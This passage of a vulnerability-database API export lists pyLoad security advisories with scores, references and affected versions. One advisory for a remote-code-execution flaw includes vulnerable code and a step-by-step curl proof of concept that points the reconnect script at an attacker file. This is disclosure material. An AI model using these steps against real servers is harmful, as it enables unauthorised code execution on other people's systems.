Implement request destination validation before initiating downloads", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33992", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10068", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33992" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/b76b6d4ee5e32d2118d26afdee1d0a9e57d4bfe8", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-30T18:29:03Z/" } ], "url": "https://github.com/pyload/pyload/commit/b76b6d4ee5e32d2118d26afdee1d0a9e57d4bfe8" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-m74m-f7cr-432x", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-30T18:29:03Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-m74m-f7cr-432x" }, { "reference_url": 
"https://nvd.nist.gov/vuln/detail/CVE-2026-33992", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33992" }, { "reference_url": "https://github.com/advisories/GHSA-m74m-f7cr-432x", "reference_id": "GHSA-m74m-f7cr-432x", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-m74m-f7cr-432x" } ], "fixed_packages": [], "aliases": [ "CVE-2026-33992", "GHSA-m74m-f7cr-432x" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ut9v-xcjn-ukb1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46794?format=api", "vulnerability_id": "VCID-vzcg-gg18-9uhg", "summary": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')\npyLoad is the free and open-source Download Manager written in pure Python. A log injection vulnerability was identified in `pyload` allowing any unauthenticated actor to inject arbitrary messages into the logs gathered by `pyload`. Forged or otherwise corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act. 
This vulnerability has been patched in version 0.5.0b3.dev77.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-21645", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.73382", "scoring_system": "epss", "scoring_elements": "0.9882", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-21645" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-17T21:13:17Z/" } ], "url": "https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21645", "reference_id": "CVE-2024-21645", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21645" }, { "reference_url": "https://github.com/advisories/GHSA-ghmw-rwh8-6qmr", "reference_id": "GHSA-ghmw-rwh8-6qmr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": 
"https://github.com/advisories/GHSA-ghmw-rwh8-6qmr" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr", "reference_id": "GHSA-ghmw-rwh8-6qmr", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-17T21:13:17Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38750?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev77", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-3355-ps9v-7ffh" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-a7fd-nsys-qub1" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hva8-kb62-rkax" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-nbnk-6g72-3ybk" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": 
"VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-xgcy-vqcp-43dj" }, { "vulnerability": "VCID-xhbh-mwv5-wfgf" }, { "vulnerability": "VCID-xs39-z9t4-wyh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev77" } ], "aliases": [ "CVE-2024-21645", "GHSA-ghmw-rwh8-6qmr" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vzcg-gg18-9uhg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57919?format=api", "vulnerability_id": "VCID-vzzm-8en6-fydc", "summary": "Denial-of-Service attack in pyLoad CNL Blueprint using dukpy.evaljs\nThe `jk` parameter is received in pyLoad CNL Blueprint. Due to the lack of `jk` parameter verification, the `jk` parameter input by the user is evaluated directly by dukpy.evaljs(), resulting in the server CPU being fully occupied and the web-ui becoming unresponsive.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57751", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00112", "scoring_system": "epss", "scoring_elements": "0.29274", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57751" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57751", "reference_id": "CVE-2025-57751", 
"reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57751" }, { "reference_url": "https://github.com/advisories/GHSA-9gjj-6gj7-c4wj", "reference_id": "GHSA-9gjj-6gj7-c4wj", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-9gjj-6gj7-c4wj" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-9gjj-6gj7-c4wj", "reference_id": "GHSA-9gjj-6gj7-c4wj", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-21T18:40:14Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-9gjj-6gj7-c4wj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48576?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev92", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { 
"vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev92" } ], "aliases": [ "CVE-2025-57751", "GHSA-9gjj-6gj7-c4wj" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vzzm-8en6-fydc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37276?format=api", "vulnerability_id": "VCID-x15r-v69w-yuaj", "summary": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all. 
This vulnerability is fixed in 0.5.0b3.dev97.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35586", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06611", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35586" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T18:16:06Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35586", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35586" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48581?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev97", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { 
"vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97" } ], "aliases": [ "CVE-2026-35586", "GHSA-ppvx-rwh9-7rj7", "PYSEC-2026-123" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x15r-v69w-yuaj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90795?format=api", "vulnerability_id": "VCID-x1ek-3cgq-skh9", "summary": "pyLoad SETTINGS Permission Users Can Achieve Remote Code Execution via Unrestricted Reconnect Script Configuration\n## Summary\n\nThe `set_config_value()` API endpoint allows users with the non-admin `SETTINGS` permission to modify any configuration option without restriction. The `reconnect.script` config option controls a file path that is passed directly to `subprocess.run()` in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in `set_config_value()` is a hardcoded check for `general.storage_folder` — all other security-critical settings including `reconnect.script` are writable without any allowlist or path restriction.\n\n## Details\n\nThe vulnerability chain spans two components:\n\n**1. 
Unrestricted config write — `src/pyload/core/api/__init__.py:210-243`**\n\n```python\n@permission(Perms.SETTINGS)\n@post\ndef set_config_value(self, category: str, option: str, value: Any, section: str = \"core\") -> None:\n self.pyload.addon_manager.dispatch_event(\n \"config_changed\", category, option, value, section\n )\n if section == \"core\":\n if category == \"general\" and option == \"storage_folder\":\n # Forbid setting the download folder inside dangerous locations\n # ... validation only for storage_folder ...\n return\n\n self.pyload.config.set(category, option, value) # No validation for any other option\n```\n\nThe `Perms.SETTINGS` permission (value 128) is a non-admin permission flag. The only hardcoded validation is for `general.storage_folder`. The `reconnect.script` option is written directly to config with no path validation, allowlist, or sanitization.\n\n**2. Arbitrary script execution — `src/pyload/core/managers/thread_manager.py:157-199`**\n\n```python\ndef try_reconnect(self):\n if not (\n self.pyload.config.get(\"reconnect\", \"enabled\")\n and self.pyload.api.is_time_reconnect()\n ):\n return False\n\n # ... checks if active downloads want reconnect ...\n\n reconnect_script = self.pyload.config.get(\"reconnect\", \"script\")\n if not os.path.isfile(reconnect_script):\n self.pyload.config.set(\"reconnect\", \"enabled\", False)\n self.pyload.log.warning(self._(\"Reconnect script not found!\"))\n return\n\n # ... reconnect logic ...\n\n try:\n subprocess.run(reconnect_script) # Executes attacker-controlled path\n except Exception:\n # ...\n```\n\nThe `reconnect_script` value comes directly from config. The only check is `os.path.isfile()` — the file must exist but there is no allowlist, no path restriction, and no signature verification.\n\n**3. 
Attacker also controls timing via same SETTINGS permission**\n\nThe attacker can set `reconnect.enabled=True`, `reconnect.start_time`, and `reconnect.end_time` through the same `set_config_value()` endpoint to control when execution occurs. `toggle_reconnect()` at line 321 requires only `Perms.STATUS` — an even lower privilege.\n\n**4. Additional privilege escalation via config access**\n\nBeyond RCE, the same unrestricted config write allows SETTINGS users to:\n- Read proxy credentials (`proxy.username`/`proxy.password`) in plaintext via `get_config()`\n- Redirect syslog to an attacker-controlled server (`log.syslog_host`/`log.syslog_port`)\n- Disable SSL (`webui.use_ssl=False`), rebind to `0.0.0.0` (`webui.host`)\n- Modify SSL certificate/key paths to enable MITM\n\n## PoC\n\n**Step 1: Set reconnect script to an attacker-controlled executable**\n\nVia API:\n```bash\n# Authenticate and get session (as user with SETTINGS permission)\ncurl -c cookies.txt -X POST 'http://target:8000/api/login' \\\n -d 'username=settingsuser&password=pass123'\n\n# Set reconnect script to a known executable on the system\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=script&value=/tmp/exploit.sh§ion=core'\n```\n\nVia Web UI:\n```bash\ncurl -b cookies.txt -X POST 'http://target:8000/json/save_config?category=core' \\\n -d 'reconnect|script=/tmp/exploit.sh&reconnect|enabled=True'\n```\n\n**Step 2: Enable reconnect and set timing window**\n\n```bash\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=enabled&value=True§ion=core'\n\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=start_time&value=00:00§ion=core'\n\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=end_time&value=23:59§ion=core'\n```\n\n**Step 3: Script executes when thread manager calls 
`try_reconnect()`**\n\nThe thread manager's `run()` method (called repeatedly by the core loop) invokes `try_reconnect()`, which calls `subprocess.run(reconnect_script)` at `thread_manager.py:199`.\n\n**Note on exploitation constraints:** The file at the target path must exist (`os.path.isfile()` check) and be executable. With `shell=False` (subprocess.run default), no arguments are passed. If the attacker also has `ADD` permission (common for non-admin users), they can use pyLoad to download an archive containing an executable script, which may retain execute permissions after extraction.\n\n## Impact\n\n- **Remote Code Execution**: A non-admin user with SETTINGS permission can execute arbitrary programs on the server as the pyLoad process user\n- **Privilege escalation**: The SETTINGS permission is described as \"can access settings\" — granting it is not expected to grant arbitrary code execution capability\n- **Credential exposure**: SETTINGS users can read proxy credentials, SSL key paths, and other sensitive config values via `get_config()`\n- **Network reconfiguration**: SETTINGS users can disable SSL, change bind address, redirect logging, and modify other security-critical network settings\n\n## Recommended Fix\n\nAdd an allowlist or category-level restriction in `set_config_value()` that prevents non-admin users from modifying security-critical options:\n\n```python\n# In set_config_value(), after the storage_folder check:\nADMIN_ONLY_OPTIONS = {\n (\"reconnect\", \"script\"),\n (\"webui\", \"host\"),\n (\"webui\", \"use_ssl\"),\n (\"webui\", \"ssl_cert\"),\n (\"webui\", \"ssl_key\"),\n (\"log\", \"syslog_host\"),\n (\"log\", \"syslog_port\"),\n (\"proxy\", \"username\"),\n (\"proxy\", \"password\"),\n}\n\nif section == \"core\" and (category, option) in ADMIN_ONLY_OPTIONS:\n # Require ADMIN role for security-critical settings\n if not self.pyload.api.user_data.get(\"role\") == Role.ADMIN:\n raise PermissionError(f\"Admin role required to modify 
{category}.{option}\")\n```\n\nAdditionally, consider validating the `reconnect.script` path against an allowlist of directories or requiring admin approval for script path changes.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33509", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29596", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33509" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://github.com/pyload/pyload/commit/f5e284fcdfeaf08436bb03e5fcf697aaac659d8b", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/commit/f5e284fcdfeaf08436bb03e5fcf697aaac659d8b" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-26T19:33:56Z/" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33509", "reference_id": "", "reference_type": 
"", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33509" } ], "fixed_packages": [], "aliases": [ "CVE-2026-33509", "GHSA-r7mc-x6x7-cqxx" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x1ek-3cgq-skh9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56093?format=api", "vulnerability_id": "VCID-xgcy-vqcp-43dj", "summary": "Duplicate Advisory: pyload-ng vulnerable to RCE with js2py sandbox escape\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-r9pp-r4xf-597r. This link is maintained to preserve external references.\n\n## Original Description\nAn issue in pyload-ng v0.5.0b3.dev85 running under python3.11 or below allows attackers to execute arbitrary code via a crafted HTTP request.", "references": [ { "reference_url": "https://github.com/Marven11/CVE-2024-39205-Pyload-RCE/tree/main", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/Marven11/CVE-2024-39205-Pyload-RCE/tree/main" }, { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39205", "reference_id": "CVE-2024-39205", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39205" }, { "reference_url": "https://github.com/advisories/GHSA-25pw-q952-x37g", "reference_id": 
"GHSA-25pw-q952-x37g", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-25pw-q952-x37g" }, { "reference_url": "https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r", "reference_id": "GHSA-r9pp-r4xf-597r", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48571?format=api", "purl": "pkg:pypi/pyload-ng@0.5.0b3.dev87", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1k5h-nhcv-cke9" }, { "vulnerability": "VCID-4fna-mzsg-w7d5" }, { "vulnerability": "VCID-6ujx-ntw5-s7dy" }, { "vulnerability": "VCID-73d4-um61-k7ht" }, { "vulnerability": "VCID-9rb6-kh78-sbdf" }, { "vulnerability": "VCID-9u2h-q8gu-t7h4" }, { "vulnerability": "VCID-bzxw-4smh-6yed" }, { "vulnerability": "VCID-c4n8-pnbr-buce" }, { "vulnerability": "VCID-f95r-tk7k-gufe" }, { "vulnerability": "VCID-f9wx-gf1u-7bgc" }, { "vulnerability": "VCID-h66k-vm3m-c3b6" }, { "vulnerability": "VCID-hkus-pqz4-uyb2" }, { "vulnerability": "VCID-hsc6-6qgc-q3eg" }, { "vulnerability": "VCID-hzu2-r32u-q7c7" }, { "vulnerability": "VCID-jxej-fugb-3ydh" }, { "vulnerability": "VCID-mbkb-u95k-yfgc" }, { "vulnerability": "VCID-ng6u-saxg-dbf9" }, { "vulnerability": "VCID-p22h-1rtx-bkcy" }, { "vulnerability": "VCID-qg7b-ayq5-8bax" }, { "vulnerability": "VCID-qmbx-7s8b-4khw" }, { "vulnerability": "VCID-u712-62py-aqgt" }, { "vulnerability": "VCID-ut9v-xcjn-ukb1" }, { "vulnerability": "VCID-vzzm-8en6-fydc" }, { "vulnerability": "VCID-x15r-v69w-yuaj" }, { "vulnerability": "VCID-x1ek-3cgq-skh9" }, { "vulnerability": "VCID-yk3e-d92p-cubu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev87" } ], "aliases": [ "GHSA-25pw-q952-x37g" ], "risk_score": 4.0, "exploitability": "0.5", 
"weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xgcy-vqcp-43dj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57593?format=api", "vulnerability_id": "VCID-xhbh-mwv5-wfgf", "summary": "Duplicate Advisory: GHSA-x698-5hjm-w2m5\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-x698-5hjm-w2m5. This link is maintained to preserve external references.\n\n### Original Description\nAny unauthenticated attacker can bypass the localhost \nrestrictions posed by the application and utilize this to create \narbitrary packages", "references": [ { "reference_url": "https://github.com/pyload/pyload", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyload/pyload" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7346", "reference_id": "CVE-2025-7346", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": 